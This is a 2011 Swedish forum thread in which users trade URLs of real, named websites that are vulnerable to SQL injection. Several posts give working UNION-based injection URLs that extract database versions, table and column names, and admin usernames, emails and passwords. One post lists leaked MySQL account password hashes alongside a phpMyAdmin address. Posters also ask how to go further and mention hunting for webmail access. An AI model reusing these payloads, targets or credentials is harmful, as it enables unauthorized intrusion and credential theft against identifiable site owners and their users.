1. Dator och IT
  2. IT-säkerhet

Samling av sidor med säkerhetsbrister - Del 2

Svara
2011-05-11, 21:23
  #2821
svettiglana
Medlem
svettiglanas avatar
Max en månad. Men jag har kommit in på en del.
Citera
2011-05-11, 23:49
  #2822
fooztr
Medlem
fooztrs avatar
SQLi
Kod: 
http://www.linux-tutorial.info/modules.php?name=MContent&pageid=99

Kika in Samling av Exploits - Bara att gå in och fylla på arkivet.
https://www.flashback.org/t1542041
Citera
2011-05-12, 22:24
  #2823
svettiglana
Medlem
svettiglanas avatar
http://www.hockeysverige.se/khl'
http://www.spelbloggen.nu/programfiler/kommentarer.asp?id=5168&typ=blogg'
http://www.stockholmfashionweek.com/schedule.php?tid=35&tbd=schedule_dwinter'
http://www.tolle.se/shop_kategori.php?kate=109'
__________________
Senast redigerad av svettiglana 2011-05-12 kl. 22:41.
Citera
2011-05-12, 23:24
  #2824
Noyameki
Medlem
Gick vidare lite på din:
http://www.spelbloggen.nu/programfil...4,5,6--%20from

Har ingen aning om vad man ska göra, men framåt går det :P Om någon vet vissa specifika metoder, PMa gärna!
Citera
2011-05-13, 09:51
  #2825
MelanotanX
Medlem
Citat:
Ursprungligen postat av ant'
Ser inte några siffror, min gissning går till error based då det fungerar bra

Kod: 
root:*5E8A9E0E119AD9982D345ECDD4E9DF8620F4FF77
debian-sys-maint:*43538AC556CEAA10F20EBB095701C28B6E02525A
phpmyadmin:*71A696369B79B7C4C9CC996975551B9B83B5B1AE
103078_nv57229:*82F89C467C092B9E1173FBB3E716AFEA47A7B702


http://www.dreamseed.nu/phpmyadmin/
Citera
2011-05-13, 09:57
  #2826
MelanotanX
Medlem
Citat:
Ursprungligen postat av KIDDe15-v2
Ah va fan bjuder på denna:


Count(*) of conservativ_ca_v1_81.users is 114884


http://www.conservative.ca/action_ce...?language_id=0
( MySQL error based injection )
Citera
2011-05-13, 15:43
  #2827
KIDDe15-v2
Bannlyst
Citat:
Ursprungligen postat av MelanotanX
Count(*) of conservativ_ca_v1_81.users is 114884


http://www.conservative.ca/action_ce...?language_id=0
( MySQL error based injection )
Ja, jag vet. Tänkte bara om någon kunde gå vidare från där?
Citera
2011-05-14, 01:43
  #2828
fooztr
Medlem
fooztrs avatar
Kod: 
http://www.seriehyllan.se/guide.php?visa=18'
Citera
2011-05-14, 01:57
  #2829
fooztr
Medlem
fooztrs avatar
Hittade ett till säkerhetshål på Stockholmfashionweek.

Kod: 
http://www.stockholmfashionweek.com/schedule.php?tid=-35/**/union/**/all/**/select/**/1,2,@@version,4,5,6--

Kod: 
http://www.larcentra.se/index.php?id=106&step=2&cId=-138/**/union/**/all/**/select/**/1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
__________________
Senast redigerad av fooztr 2011-05-14 kl. 02:05.
Citera
2011-05-14, 02:16
  #2830
FangO-
Medlem
Ett säkerhetshål i vinfabriken :-)
Citat:
http://www.prairieberry.com/news/index.php?newsid=38%27
Citera
2011-05-14, 02:26
  #2831
fooztr
Medlem
fooztrs avatar
Körde vidare på denna:
Kod: 
http://www.larcentra.se/index.php?id=106&step=2&cId=-138/**/union/**/all/**/select/**/1,group_concat(table_name,0x3a,column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/from/**/information_schema.columns/**/where%20table_schema=database()--

Kod: 
http://www.larcentra.se/index.php?id=106&step=2&cId=-138/**/union/**/all/**/select/**/1,group_concat(usrname,0x3a,email,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/from/**/admin--
__________________
Senast redigerad av fooztr 2011-05-14 kl. 02:38.
Citera
2011-05-14, 02:37
  #2832
Noyameki
Medlem
Citat:
Ursprungligen postat av fooztr
Körde vidare på denna:
Kod: 
http://www.larcentra.se/index.php?id=106&step=2&cId=-138/**/union/**/all/**/select/**/1,group_concat(table_name,0x3a,column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/from/**/information_schema.columns/**/where%20table_schema=database()--

Kod: 
http://www.larcentra.se/index.php?id=106&step=2&cId=-138/**/union/**/all/**/select/**/1,group_concat(usrname,0x3a,email,pwd),group_concat(usrname,0x3a,email,pwd),4,5,6,7,8,9,10,11,12,13,  14,15,16,17,18,19,20/**/from/**/admin--

Det verkar bara finnas 2 användare dock. Ska se om man kan hitta rätt adress till webmailen.
Citera
Svara

Skapa ett konto eller logga in för att kommentera

Du måste vara medlem för att kunna kommentera

Skapa ett konto

Det är enkelt att registrera ett nytt konto

Bli medlem

Logga in

Har du redan ett konto? Logga in här

Logga in